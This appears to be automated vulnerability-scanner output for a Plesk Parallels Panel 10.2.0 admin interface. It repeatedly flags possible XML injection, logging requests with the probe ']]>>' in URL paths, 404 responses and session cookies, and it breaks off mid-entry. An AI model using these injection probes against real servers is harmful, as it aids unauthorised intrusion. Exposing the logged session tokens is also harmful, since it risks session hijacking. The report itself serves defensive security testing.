The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/reseller/personal-info/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=customers
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 24 Sep 2011 15:44:05 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/tools/id/3/
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/reseller/tools/id/3/?context=reseller-tools HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; psaContext=service-plans
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 24 Sep 2011 15:35:53 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/scripts/admin-panel.js
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/scripts/admin-panel.js?1301570630 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:59:32 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/server/settings
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/server/settings?context=settings HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=subscriptions
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:14:22 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/server/tools
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/server/tools?context=tools HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=settings
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:14:22 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/subscription/create
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/subscription/create HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/reseller Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; BarExpanded=True; psaContext=home
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 24 Sep 2011 15:46:51 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/subscription/list
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/subscription/list?context=subscriptions HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=domains
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:14:22 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/subscription/list/reset-search/true/
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/subscription/list/reset-search/true/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:20:25 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/subscription/login
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /admin]]>>/subscription/login?returnUrl=/admin/home/admin HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:58:56 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/favicon.ico
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /favicon.ico]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:24:51 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/get_password.php
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
POST /get_password.php]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive Content-Length: 114 Cache-Control: max-age=0 Origin: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/get_password.php Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/javascript/chk.js.php
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /javascript]]>>/chk.js.php HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:01:37 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/javascript/chk.js.php
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /javascript/chk.js.php]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:01:39 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/javascript/common.js
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /javascript]]>>/common.js?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:27 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/javascript/common.js
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /javascript/common.js]]>>?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:33 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/javascript/frameset.js
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /javascript]]>>/frameset.js?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:27:24 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/javascript/frameset.js
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /javascript/frameset.js]]>>?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:27:30 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/javascript/jsw.js
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /javascript]]>>/jsw.js?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:37 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/javascript/jsw.js
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /javascript/jsw.js]]>>?plesk_version=psa-10.2.0-1011110331.18 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: */* Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 18:25:43 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/javascript/leftframe.js
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /javascript]]>>/leftframe.js HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:14 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/javascript/leftframe.js
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /javascript/leftframe.js]]>> HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Fri, 23 Sep 2011 19:19:17 GMT Server: sw-cp-server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/javascript/main.js
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
